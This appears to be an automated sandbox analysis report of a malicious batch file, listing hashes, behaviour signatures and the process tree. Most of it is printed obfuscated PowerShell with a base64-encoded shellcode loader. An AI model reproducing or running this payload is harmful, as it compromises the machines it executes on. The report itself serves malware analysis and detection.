fbb44c5cc51bc4660c5ba48b12bcaef9b7b7c1296498e6b17fe8c0c12f60855f

General

Target

a.bat
Size

7KB
MD5

f3df25231a46629a2bf284b163c214f4
SHA1

11b6996ef719e34e70e008e51e51df238573ddb8
SHA256

fbb44c5cc51bc4660c5ba48b12bcaef9b7b7c1296498e6b17fe8c0c12f60855f
SHA512

bfa174b72a6454f163c9bc72da135f48c0ec8c741ba57017f8782bc63843f7f290f61e607d65afee297a3a7504138a26d8ef7ef91eeaa432369a3346257647bd
SSDEEP

192:/MHXvXhjyhhWSn6wF4XyBa95dXfaYOTPJ:/cXhjyhkSrF4XyBa95hBWPJ

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe
16	1692	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1692 powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1516 powershell.exe
1516 powershell.exe
4772 powershell.exe
4772 powershell.exe
1692 powershell.exe
1692 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1516 powershell.exe
Token: SeDebugPrivilege 4772 powershell.exe
Token: SeDebugPrivilege 1692 powershell.exe

pid	process
1692	powershell.exe

pid	process
1516	powershell.exe
1516	powershell.exe
4772	powershell.exe
4772	powershell.exe
1692	powershell.exe
1692	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1364 wrote to memory of 1516	1364	cmd.exe	powershell.exe
PID 1364 wrote to memory of 1516	1364	cmd.exe	powershell.exe
PID 1516 wrote to memory of 4772	1516	powershell.exe	powershell.exe
PID 1516 wrote to memory of 4772	1516	powershell.exe	powershell.exe
PID 4772 wrote to memory of 1692	4772	powershell.exe	powershell.exe
PID 4772 wrote to memory of 1692	4772	powershell.exe	powershell.exe
PID 4772 wrote to memory of 1692	4772	powershell.exe	powershell.exe
PID 1692 wrote to memory of 1540	1692	powershell.exe	csc.exe
PID 1692 wrote to memory of 1540	1692	powershell.exe	csc.exe
PID 1692 wrote to memory of 1540	1692	powershell.exe	csc.exe
PID 1540 wrote to memory of 4732	1540	csc.exe	cvtres.exe
PID 1540 wrote to memory of 4732	1540	csc.exe	cvtres.exe
PID 1540 wrote to memory of 4732	1540	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv GYH -;sv Kn ec;sv dBi ((gv GYH).value.toString()+(gv Kn).value.toString());powershell (gv dBi).value.toString() ('JABZAFIAPQAnACQAdABvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABwAGMAYgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQASABLAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQA1ADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQAyAGQALAB9ADMAZgAsAH0ANgAzACwAfQAzADIALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACw'+'AfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAFIAUwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAdABvACAALQBOAGEAbQBlACAAIgBzAFYAIgAgAC0AbgBhAG0AZQBzACAAVQBGAG4AOwAkAFIAUwA9ACQAUgBTAC4AcgBlAHAAbABhAGMAZQAoACIAVQBGAG4AIgAsACAAIgBXAGkAIgArACIAbgAiACsAIgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQASABLACAAPQAgACQASABLAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBWAHUAVgB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFYAdQBWACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEQAPQAwAHgAMQAwADAANgA7AGkAZgAgACgAJABIAEsALgBMACAALQBnAHQAIAAwAHgAMQAwADAANgApAHsAJABUAEQAPQAkAEgASwAuAEwAfQA7ACQARABTAD0AJABSAFMAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADYALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAHAAYwBiACAAPQAgADAAOwBmAG8AcgAoACQAQQBVAD0AMAA7ACQAQQBVACAALQBsAGUAKAAkAEgASwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABBAFUAKwArACkAewAkAFIAUwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEQAUwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABBAFUAKQAsACAAJABIAEsAWwAkAEEAVQBdACwAIAAxACkAfQA7ACQAUgBTADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAEQAUwAsACAAMAB4ADEAMAAwADYALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAHAAYwBiACkAOwAkAHUAUgBVAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAFIAUwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAdQBSAFUALAAkAEQAUwAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAHYAUAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWQBSACkAKQA7ACQAZwBoAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEAdQA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABBAGgAaAAgAD0AIAAiAEMAOgBcACQAcQB1AFwAWABHAE4ASgBKAHMAVABcACQAcQB1ACQAZwBoAFwAdgAxAC4AMABcACQAZwBoACIAOwAkAEEAaABoACAAPQAgACQAQQBoAGgALgByAGUAcABsAGEAYwBlACgAIgBYAEcATgAiACwAIAAiAHMAeQBzACIAKQA7ACQAQQBoAGgAIAA9ACAAJABBAGgAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEoASgBzAFQAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJABQAGcATwBaACAAPQAgACcAVAByACIAKwAiAHUAIgArACIAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAFAAZwBPAFoAJwApAHsAJABnAGgAPQAgACQAQQBoAGgAfQA7ACQAbABRAD0AIgAgACQAZwBoACAAaQBiAHUAZAAgACQAdgBQACIAOwAkAGwAUQA9ACQAbABRAC4AcgBlAHAAbABhAGMAZQAoACIAaQBiAHUAZAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAGwAUQA=')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAFIAPQAnACQAdABvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABwAGMAYgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQASABLAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQA1ADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQAyAGQALAB9ADMAZgAsAH0ANgAzACwAfQAzADIALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAFIAUwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAdABvACAALQBOAGEAbQBlACAAIgBzAFYAIgAgAC0AbgBhAG0AZQBzACAAVQBGAG4AOwAkAFIAUwA9ACQAUgBTAC4AcgBlAHAAbABhAGMAZQAoACIAVQBGAG4AIgAsACAAIgBXAGkAIgArACIAbgAiACsAIgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQASABLACAAPQAgACQASABLAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBWAHUAVgB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFYAdQBWACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEQAPQAwAHgAMQAwADAANgA7AGkAZgAgACgAJABIAEsALgBMACAALQBnAHQAIAAwAHgAMQAwADAANgApAHsAJABUAEQAPQAkAEgASwAuAEwAfQA7ACQARABTAD0AJABSAFMAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADYALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAHAAYwBiACAAPQAgADAAOwBmAG8AcgAoACQAQQBVAD0AMAA7ACQAQQBVACAALQBsAGUAKAAkAEgASwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABBAFUAKwArACkAewAkAFIAUwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEQAUwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABBAFUAKQAsACAAJABIAEsAWwAkAEEAVQBdACwAIAAxACkAfQA7ACQAUgBTADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAEQAUwAsACAAMAB4ADEAMAAwADYALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAHAAYwBiACkAOwAkAHUAUgBVAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAFIAUwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAdQBSAFUALAAkAEQAUwAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAHYAUAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWQBSACkAKQA7ACQAZwBoAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEAdQA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABBAGgAaAAgAD0AIAAiAEMAOg